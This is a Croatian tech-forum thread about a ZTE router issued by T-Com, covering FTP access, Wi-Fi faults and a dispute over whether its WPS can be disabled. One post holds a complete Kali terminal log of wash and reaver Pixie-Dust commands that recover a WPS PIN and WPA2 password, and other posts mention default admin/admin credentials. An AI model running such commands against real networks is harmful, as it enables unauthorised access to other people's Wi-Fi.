Forumi


Povratak   PC Ekspert Forum > Računala > Mreže
Ime
Lozinka

Odgovori
 
Uređivanje
Staro 12.12.2016., 23:16   #1231
ThePornstar
Premium
Moj komp
 
ThePornstar's Avatar
 
Datum registracije: Nov 2007
Lokacija: -
Postovi: 3,688
Došao do FTP-a u browseru, ali preko My Computer - ništa. Napravim network location i 0 bodova.
Doduše, u My Computer ga dobijem kao Media Device kad uključim UPNP, ali to mi ne igra
__________________

RIP!

MTM: 6457-A88 @ modded BIOS 2.29 1.08

CPU: Intel T8100 (undervolted - 0.95V @ full speed Dual IDA)

RAM: 4 GB

VGA: Endivija Quadro NVS 140M (undervolted @ 0.95V)

HDD: Seagate ST9100821AS 100GB/7200 RPM

LCD: 15.4" WXGA

OS: Win 10 Pro x64

Battery: OEM MTec 9 cell 8800mAh (Sanyo)






MTM: 4236-AJ3

CPU: Intel i5 2520M

RAM: 8 GB

VGA: Intel HD 3000 + nVidia NVS 4200M

HDD: Seagate 500 GB / 7200 RPM

LCD: 14" HD+

OS: Win 10 Pro x64

Battery: 9 cell, 94 Wh (Panasonic)







MTM: 4242-NP6

CPU: Intel i5 2430M

RAM: 8 GB

VGA: Intel HD 3000 + nVidia NVS 4200M

HDD: SanDisk SSD Plus 120 GB

LCD: 15.6" HD+

OS: Win 10 Pro x64

Battery: 6 cell 56 Wh







CPU: Intel i5 5300u

RAM: 12 GB

VGA: Intel HD 5500

SSD1: Crucial MX300 275 GB 2.5" SATA

SSD2: Transcend T430s 256 GB m.2 2242 SATA

LCD: AUO B140HAN01.3 / 14" IPS FHD

OS: Win 10 Pro x64

Battery: 3 cell internal + 3 cell / 6 cell external






ROM: OPN27.76-12-22 (8.0.0)
ThePornstar je offline   Reply With Quote
Staro 12.12.2016., 23:39   #1232
Prezime
Premium
 
Datum registracije: Aug 2013
Lokacija: Zagreb
Postovi: 2,972
Meni preko FTP uredno radi i preko browsera i preko Total Commandera kojeg kristim u takvim slucajevima za transfer.
Kako Nikky rece username/pass su admin/admin i brzine su zastrasujucih 1,5MB/s (12Mbit/s)
Prezime je offline   Reply With Quote
Oglasni prostor
Oglas
 
Oglas
Staro 12.12.2016., 23:40   #1233
Nikky
Moderator
 
Nikky's Avatar
 
Datum registracije: Sep 2006
Lokacija: St
Postovi: 16,970
Pa zapamti ftp link i njega koristi.
Nikky je offline   Reply With Quote
Staro 19.12.2016., 15:07   #1234
Stručnjak
Registered User
 
Stručnjak's Avatar
 
Datum registracije: Dec 2016
Lokacija: Tunguzija
Postovi: 10
Exclamation Sigurnosni propust

Ne znam da li ste upoznati, ali ovaj router ima ozbiljnu rupu sa sigurnošću mreže. Naime, ne može se isključiti WPS, te se lako može probiti bilo koji WPA2 password. Ne mogu vjerovati da se ovo smeće nudi korisnicima.
Stručnjak je offline   Reply With Quote
Staro 19.12.2016., 15:11   #1235
geronimo_2
Premium
Moj komp
 
geronimo_2's Avatar
 
Datum registracije: Jun 2005
Lokacija: Rijeka / Grobnik
Postovi: 2,874
ha. zanimljivo.
sva sreca da mi je wifi uvjek na off :-)
geronimo_2 je offline   Reply With Quote
Staro 19.12.2016., 16:35   #1236
Prezime
Premium
 
Datum registracije: Aug 2013
Lokacija: Zagreb
Postovi: 2,972
Citiraj:
Autor Stručnjak Pregled postova
Ne znam da li ste upoznati, ali ovaj router ima ozbiljnu rupu sa sigurnošću mreže. Naime, ne može se isključiti WPS, te se lako može probiti bilo koji WPA2 password. Ne mogu vjerovati da se ovo smeće nudi korisnicima.
Ne pricaj bedastoce i siri dezinformacije

Prezime je offline   Reply With Quote
Staro 19.12.2016., 16:42   #1237
geronimo_2
Premium
Moj komp
 
geronimo_2's Avatar
 
Datum registracije: Jun 2005
Lokacija: Rijeka / Grobnik
Postovi: 2,874
moj to nema. a kad smo vec kod toga, ni GUI mi tako ne izgleda
pretpostavljam da je u ovome stos:

Device Type ZXDSL 931VII V4.0
Device Serial No. ZTExxxxxxxxxxxxx
Batch No. T2
HW Version V1.1.0
SW Version V1.0.3_B_CROATIA
BOOT Version V1.0.4
geronimo_2 je offline   Reply With Quote
Staro 19.12.2016., 16:47   #1238
Prezime
Premium
 
Datum registracije: Aug 2013
Lokacija: Zagreb
Postovi: 2,972
Da, u tome stos, a kolko znam na toj verziji WPS uopce ne radi, tj ukljucen je samo lokalno na gumb.
Na starijim verzijama FW se moze ukljucit ili lokalno na gumb, ili preko PIN-a i nikako drugacije ne radi...

Model ZXDSL 931VII
Serial Number ZTEE40NFXXXXXX
Batch Number p8
Hardware Version V1.0.0
Software Version V2.0.00.CROATT02
Boot Loader Version V1.0.03
Prezime je offline   Reply With Quote
Staro 19.12.2016., 17:10   #1239
Nikky
Moderator
 
Nikky's Avatar
 
Datum registracije: Sep 2006
Lokacija: St
Postovi: 16,970
Jesi ušao kao user vugaris ili kao admin ?
Moguće da kao admin vidi a kao user ne vidi tu opciju.
Nikky je offline   Reply With Quote
Staro 19.12.2016., 19:08   #1240
geronimo_2
Premium
Moj komp
 
geronimo_2's Avatar
 
Datum registracije: Jun 2005
Lokacija: Rijeka / Grobnik
Postovi: 2,874
ja ulazim sa "administrator" pod username-om.
geronimo_2 je offline   Reply With Quote
Oglasni prostor
Oglas
 
Oglas
Staro 21.12.2016., 12:23   #1241
Stručnjak
Registered User
 
Stručnjak's Avatar
 
Datum registracije: Dec 2016
Lokacija: Tunguzija
Postovi: 10
Device Type ZXDSL 931VII V4.0 Nema mogućnosti isključenja WPS-a. Došao tehničar, tražio . . . , tražio . . . tražio i nema. Pitao svoje pajdaše i rekli mu da nema. Najgore je to da je stalno uključen i kao takav se dijeli korisnicima. Drugi dan mi je donio Speedport na kojem postoji mogućnost isključenja WPS-a. Međutim, Speedport je tema za sebe po drugim pitanjima ali mi barem mreža nije kompromitirana. Inače za informaciju, ZTE router sa uključenim WPS-om se skreka za manje od 3 minute.
Stručnjak je offline   Reply With Quote
Staro 21.12.2016., 12:55   #1242
Prezime
Premium
 
Datum registracije: Aug 2013
Lokacija: Zagreb
Postovi: 2,972
Jesi se TI probao spojit na njega preko WPS-a? Jesi se uspio spojit? Sto te je router tad trazio?
Na istom takvom routeru kod frenda uopce ne reagira kad se bilo tko proba spojit preko WPS-a. Uvjek se na uredjaju koji se pokusava spojit dobije Time-out.
Ako se ti uspijes spojit na svoj, onda je u tvom routeru nesto u banani.

Btw, kako znas da je WPS na njemu stalno ukljucen?
Prezime je offline   Reply With Quote
Staro 21.12.2016., 17:31   #1243
back2quick
Banned
 
Datum registracije: Jan 2012
Lokacija: righthere
Postovi: 442
znaš kad ćeš bit stručnjak? 2027.

ZTE v4 ima vjerojatno samo PBC aktivan i bez tipke nećeš skrekat ništa. ili ako je u igri i PIN onda tek ne radi.

nakon par (10-ak?) neuspjelih pokušaja WPS se automatski isključi
back2quick je offline   Reply With Quote
Staro 21.12.2016., 21:16   #1244
Prezime
Premium
 
Datum registracije: Aug 2013
Lokacija: Zagreb
Postovi: 2,972
Nakon 3 neuspjesna pokusaja, upravo pred 2 sata isprobano na potpuno novoj instalaciji Max3 paketa sa doticnim (potpuno "tvornicki" podesenim) routerom.
Prezime je offline   Reply With Quote
Staro 23.12.2016., 21:35   #1245
Guls
Premium
Moj komp
 
Guls's Avatar
 
Datum registracije: Nov 2004
Lokacija: Sveta Nedelja
Postovi: 2,740
Krepao mi treci u nizu. Sve ok ali ne ide na wan. Uvijek ista stvar i uvijek mi zamijene router, navodno softverska greska. Posto su sad praznici i glupo mi je biti bez neta, postoji li neki firmware upgrade ili nesto sto mogu uciniti da ga osposobim?
__________________

Notebook HP Omen 17-an012nm
Intel 7700HQ
8GB DDR4 2133MHz
1TB HDD + 128GB PCIe NVMe M.2 SSD
nVidia GTX 1050Ti 4GB

Periferija
27" BenQ GW2765 1440p
Corsair SP2500 2.1
Coolermaster Masterkeys combo



Intel Compute Stick STK1AW32SC x5-Z8300 1.44GHz + Windows 10 Home
Sony Playstation 4 Slim 500GB
4K Samsung 50" UE50KU6072
Logitech K400 wireless keyboard
Guls je offline   Reply With Quote
Staro 23.12.2016., 22:19   #1246
Prezime
Premium
 
Datum registracije: Aug 2013
Lokacija: Zagreb
Postovi: 2,972
Imam doma dva takva identicna routera, jedan "njihov" i jedan moj. Njihov ima cudnu gresku za koju nitko (kao) nije cuo niti ju zna rijesit - nakon 6-8 tjedana uptime-a totalno poludi ethernet switch i preko njega nemogu na internet, iako istovremeno sve uredno radi preko WiFi-a
Rjesenje je izvuci napajanje iz struje na minutu i ponovno ukljuciti, pa cekati 6-8 tjedana da mu se opet pomjesaju zivci...

Drugi (moj) kojeg trenutno koristim jer mi ovih dana treba jaci wifi, a na njega sam stavio dvije vanjske antene, ima pak drugu gresku - inicijalno se spoji sa 6.0 dB, pa svaki dan dize 0,1-0,2 dB dok ne dodje na 7-7,2 i onda pukne DSL i nanovo se sinkronizira na 6,0 dB. Sve to na istoj brzini koja varira tijekom dana od max 15200-15800, a koristim stalnih 12250.
Prezime je offline   Reply With Quote
Staro 24.12.2016., 13:56   #1247
Stručnjak
Registered User
 
Stručnjak's Avatar
 
Datum registracije: Dec 2016
Lokacija: Tunguzija
Postovi: 10
Ne mogu poslati SS jer nakon što tehničar nije mogao isključiti WPS pošto nije pronašao tu opciju, na moj zahtjev, dobio sam Speedport u zamjenu. Niže je protokol testiranja sigurnosti mojeg ZTE routera na WPS sa probijenim PIN-om i WPA2/AES passwordom (na dnu boldano).
Naime, navedeni router sam dobio prije mjesec dana jer sam prešao na 100 Mbit optiku.
Da ponovim, na navedenom routeru uz najnoviji firmware, nije moguće isključiti WPS. Na protokolu sam BSSID i ESSID zbog privatnosti zamijenio sa "x".
Ako ti na svojem routeru imaš opciju isključenja WPS-a, ovaj post se ne odnosi na tebe već je upozorenje za sve koji su nedavno dobili ZTE.
Znam samo da mi je susjed također dobio optiku i njegov WPS je također aktivan.
-----------------------------------------------------------------------------------------------
root@kali:~# wash -i mon0

Wash v1.5.2 WiFi Protected Setup Scan Tool
Copyright (c) 2011, Tactical Network Solutions, Craig Heffner
mod by t6_x & DataHead & Soxrok2212

BSSID Channel RSSI WPS Version WPS Locked ESSID
---------------------------------------------------------------------------------------------------------------
xx:xx:xx:xx:xx:xx 2 -41 1.0 No xxxxxx

^C
root@kali:~# reaver -c 2 -i mon0 -b xx:xx:xx:xx:xx:xx -vv -K 1

Reaver v1.5.2 WiFi Protected Setup Attack Tool
Copyright (c) 2011, Tactical Network Solutions, Craig Heffner
mod by t6_x & DataHead & Soxrok2212

[+] Switching mon0 to channel 2
[+] Waiting for beacon from xx:xx:xx:xx:xx:xx
[+] Associated with xx:xx:xx:xx:xx:xx (ESSID: xxxxxx)
[+] Starting Cracking Session. Pin count: 0, Max pin attempts: 11000
[+] Trying pin 12345670.
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[P] E-Nonce: 7c:d1:48:e0:07:7a:1b:f6:2f:d0:56:e4:e7:ab:e3:a1
[P] PKE: c5:7a:18:62:dc:0f:2a:4c:82:b9:57:3f:e8:27:31:1b:eb:75:45:d6:c6:14:f4:eb:4f:b8:57:dd:1b:09:b1:6c:01:e8:7e:b1:86:a2:1c:66:e1:20:c7:16:86:b5:64:07:51:1
c:a8:ce:3f:76:f8:ff:b8:8a:bc:19:ff:85:58:6f:13:36:ff:59:41:a5:65:d2:2c:97:9a:71:36:7a:97:b9:e5:f3:58:2d:56:fc:16:65:87:75:fb:8c:32:36:86:19:1e:f6:e3:91:16:
af:96:7e:68:2e:2f:9f:72:68:b1:f7:29:16:48:dd:4c:4e:28:0b:ee:b5:1b:45:b3:c8:d6:45:0f:7e:20:b3:34:73:23:79:72:0c:2f:68:e0:6c:87:a1:04:a2:55:61:50:f6:f4:84:
14:7b:52:82:9a:0b:27:06:76:ea:6b:b4:13:94:6a:6b:43:dd:3b:8f:44:34:e0:0e:ef:7d:fa:df:db:83:77:5a:d9:a3:02:44:c3:89:23:8c
[P] WPS Manufacturer: ZTE
[P] WPS Model Name: ZXHN H367N
[P] WPS Model Number: V1.0
[P] Access Point Serial Number: 12345678
[+] Received M1 message
[P] R-Nonce: 16:de:e8:fa:19:25:5f:13:3b:45:0d:75:ce:e9:e7:a7
[P] PKR: f6:97:17:9f:8a:d5:59:68:24:e9:f3:68:1a:18:80:4f:34:cc:b4:ab:a9:3f:31:d4:c3:c0:f0:f9:34:09:d8:d4:ed:92:d0:ff:53:22:3e:0f:6e:40:03:2d:bc:95:f9:8d:c6:
1a:b6:e5:1c:67:7f:8f:d9:f7:f4:02:20:84:b1:cc:6e:1c:00:04:31:7c:b9:4f:cb:82:11:28:4d:79:3a:80:c1:97:80:ee:ff:56:ce:24:5f:ba:6c:59:eb:07:44:c0:84:c0:7d:a8:f2:
1e:a5:14:f9:8c:52:80:a7:31:b5:62:4d:f6:b8:a0:85:0e:9f:3a:06:ca:58:e0:df:a3:f2:4a:44:c8:60:0f:4d:f6:28:7e:68:0d:af:81:82:bf:54:aa:23:97:4a:34:45:e7:a1:d2:27:
32:6c:4e:db:48:c4:d0:34:9e:35:01:9b:d9:2b:21:68:f5:ec:e8:d9:16:96:88:c4:d4:5e:a4:22:d1:7b:7a:ed:ad:69:d9:5d:05:fb:7b
[P] AuthKey: 08:4f:c3:96:90:80:f4:c7:97:eb:85:5e:12:1f:78:5c:f8:90:d6:6f:34:73:fd:2c:d8:34:0b:d6:4a:29:6d:1e
[+] Sending M2 message
[P] E-Hash1: 8c:70:d6:c4:d3:45:47:6e:d4:fb:e9:1c:f3:fe:13:b4:4b:8c:35:e6:53:51:a4:4c:bc:e5:d0:d8:08:6d:f0:1b
[P] E-Hash2: 88:50:c2:21:f3:a3:a0:f2:e1:29:97:31:8f:a9:09:6b:da:9b:85:15:b7:c8:c4:da:7f:f1:bd:45:34:a8:f5:f7
[Pixie-Dust]
[Pixie-Dust] Pixiewps 1.2
[Pixie-Dust]
[Pixie-Dust] [*] Mode: 1 (RT/MT)
[Pixie-Dust] [*] PSK1: d0:d2:73:18:16:2d:d8:7f:ad:33:1d:8c:b0:8b:81:5b
[Pixie-Dust] [*] PSK2: 7a:5c:51:90:20:54:0c:8e:d7:0c:d4:60:8c:56:fa:67
[Pixie-Dust] [*] E-S1: 00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00
[Pixie-Dust] [*] E-S2: 00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00
[Pixie-Dust] [+] WPS pin: 60273468
[Pixie-Dust]
[Pixie-Dust] [*] Time taken: 0 s 97 ms
[Pixie-Dust]
Running reaver with the correct pin, wait ...
Cmd : reaver -i mon0 -b xx:xx:xx:xx:xx:xx -c 2 -s y -vv -p 60273468

[Reaver Test] BSSID: xx:xx:xx:xx:xx:xx
[Reaver Test] Channel: 2
[Reaver Test] [+] WPS PIN: '60273468'
[Reaver Test] [+] WPA PSK: '31qc8i4pgmcat6ht'
[Reaver Test] [+] AP SSID: ‘xxxxxx’
root@kali
Stručnjak je offline   Reply With Quote
Staro 24.12.2016., 15:31   #1248
back2quick
Banned
 
Datum registracije: Jan 2012
Lokacija: righthere
Postovi: 442
kako znaš da imaš najnoviji firmware? koja verzija a koje su prethodne bile?
back2quick je offline   Reply With Quote
Staro 25.12.2016., 09:47   #1249
tascam
Registered User
 
Datum registracije: Jun 2010
Lokacija: hr
Postovi: 293
Pozdrav svima i sretan Božić.Imam problema sa ovim ruterom(prva verzija).Uspio sam riješiti problem sa delay-om, međutim sada mi se otprilike svaka 2 dana događa da imam wlan signala, ali nemam protoka signala.

Ovako izgledaju postavke:

tascam je offline   Reply With Quote
Staro 27.12.2016., 18:39   #1250
vacs
Premium
Moj komp
 
vacs's Avatar
 
Datum registracije: Oct 2008
Lokacija: Tu negdje
Postovi: 1,109
prijavi kvar i dobit ces novi ruter, nema smisla da se patis na tom starom
vacs je offline   Reply With Quote
Staro 28.12.2016., 10:14   #1251
tascam
Registered User
 
Datum registracije: Jun 2010
Lokacija: hr
Postovi: 293
Imam 4.0 verziju ali ovaj stari mi ozbiljnije djeluje, pa sam htio da bude u potpunosti funkcionalan....
tascam je offline   Reply With Quote
Staro 28.12.2016., 16:13   #1252
Prezime
Premium
 
Datum registracije: Aug 2013
Lokacija: Zagreb
Postovi: 2,972
Citiraj:
Autor tascam Pregled postova
Pozdrav svima i sretan Božić.Imam problema sa ovim ruterom(prva verzija).Uspio sam riješiti problem sa delay-om, međutim sada mi se otprilike svaka 2 dana događa da imam wlan signala, ali nemam protoka signala.
Sto tocno znaci "nemam protoka signala"?

U konfiguraciji na tom mjestu prvo stavi pod "Channel" neki fiksni kanal. (potrazi koji su slobodni od susjednih utjecaja, ako mozes koristi 3 ili 6 ili 9)
Drugo, ukljuci opciju "SGI Enable"
Trece, "QoS Type" stavi na Disabled

Nadam se da si vec iskljucio IPv6 na tom routeru, ako nisi to isto uradi!
Prezime je offline   Reply With Quote
Staro 29.12.2016., 10:29   #1253
tascam
Registered User
 
Datum registracije: Jun 2010
Lokacija: hr
Postovi: 293
Pokazuje na mobitelu wlan signal,kada pokušam pokrenuti neku aplikaciju (tipa Večernji List),vrti vrti i napiše internet greška.

Probat ću još sa ovime što si naveo.
tascam je offline   Reply With Quote
Staro 30.12.2016., 10:22   #1254
tascam
Registered User
 
Datum registracije: Jun 2010
Lokacija: hr
Postovi: 293
sve sam ovo pokušao, ali nakon nekog vremena Wlan problem je i dalje prisutan.Isto mi se događalo i na 2 ista routera.

V 4.0 radi bez greške.

ne znam da li bi se mogla upucati u njega fw od 4.0.verzije?
tascam je offline   Reply With Quote
Staro 30.12.2016., 15:57   #1255
Prezime
Premium
 
Datum registracije: Aug 2013
Lokacija: Zagreb
Postovi: 2,972
Jesi sigurno iskljucio IPv6 na oba mjesta?

FW sa 4.0 nejde na njega!
Prezime je offline   Reply With Quote
Staro 30.12.2016., 17:44   #1256
tascam
Registered User
 
Datum registracije: Jun 2010
Lokacija: hr
Postovi: 293
Da,sve sam napravio po tvojim uputama i ne radi dobro.Poskenirao sam wlan kanale i 13 mi je najjači.Postavio sam ga fiksno.
tascam je offline   Reply With Quote
Staro 30.12.2016., 18:14   #1257
Prezime
Premium
 
Datum registracije: Aug 2013
Lokacija: Zagreb
Postovi: 2,972
Jos jedna mogucnost je da na mobitelu, ako je android, iskljucis IPv6. Ako tu mogucnost nemas u postavkama WiFi-a, onda imas na trgovini aplikacije kojima se to moze uraditi...
Jel imas ili mozes posudit, jos jedan uredjaj za ispitat WiFi funkcionalnost, da definitivno ustanovis jel to do routera ili tvog client uredjaja.
Prezime je offline   Reply With Quote
Staro 31.12.2016., 05:12   #1258
iNoob
Game Collector
Moj komp
 
iNoob's Avatar
 
Datum registracije: Jun 2010
Lokacija: Viškovo (Rijeka)
Postovi: 363
U vezi ove rasprave o nemogućnosti isključivanja WPS-a na ZXDSL 931VII u ispisu probijanja WPS pina kojeg je @Stručnjak stavio piše

[P] WPS Manufacturer: ZTE
[P] WPS Model Name: ZXHN H367N
[P] WPS Model Number: V1.0

Neka me netko ispravi ako griješim ali to je sasvim drugačiji ruter.
__________________
Trust me - I know what I'm doing!
iNoob je offline   Reply With Quote
Staro 31.12.2016., 12:55   #1259
Prezime
Premium
 
Datum registracije: Aug 2013
Lokacija: Zagreb
Postovi: 2,972
Da, to je stari model ZXHN H367N serije koji se dilao u Nizozemskoj, a kod nas ga T-Com nije dijelio, osim mozda testirao u nekoj testnoj fazi.

Kod na su dilali model ZXDSL 931VII, pa sve ono kaj je taj NEstrucnjak nadrobil mirno zaboravi, jer je to neki C/P s nekog sajta

Btw, imam frenda koji se odavno bavi probijanjem zastita i ima apsolutno sve moguce potrebne "alatke" za tu rabotu i ZTE koji se kod nas dijeli nije nikad uspio provalit preko WPS-a. Taj model uredno probija preko nedovoljno jake WiFi zastite koju jos uvjek mnogi imaju podesenu.

Zadnje izmijenjeno od: Prezime. 31.12.2016. u 13:00.
Prezime je offline   Reply With Quote
Staro 31.12.2016., 14:32   #1260
back2quick
Banned
 
Datum registracije: Jan 2012
Lokacija: righthere
Postovi: 442
star u NL nov u HR. kod njih se zove zxhn 367 kod nas i u grčkoj zxdsl 931. ovaj što kaže da je sasvim drugačiji nek posta hw info oba modela. vjerojatno su identični a onaj ko je radio fw repack nije promjenio model ID.

kad sam prvi put isprobavao ovo što ovaj gore tvrdi na 2 ili 3 (ne sjećam se točno) v4 rutera svi su vraćali timeout.

drugi put je na jednom otkrio pin i pass iz prve na drugom i dalje timeout. uglavnom bez WPSa postavljenog na PIN ovo neće šljakat, a default je valjda PBC
back2quick je offline   Reply With Quote
Oglasni prostor
Oglas
 
Oglas
Odgovori


Uređivanje

Pravila postanja
Vi ne možete otvarati nove teme
Vi ne možete pisati odgovore
Vi ne možete uploadati priloge
Vi ne možete uređivati svoje poruke

BB code je Uključeno
Smajlići su Uključeno
[IMG] kod je Uključeno
HTML je Uključeno

Idi na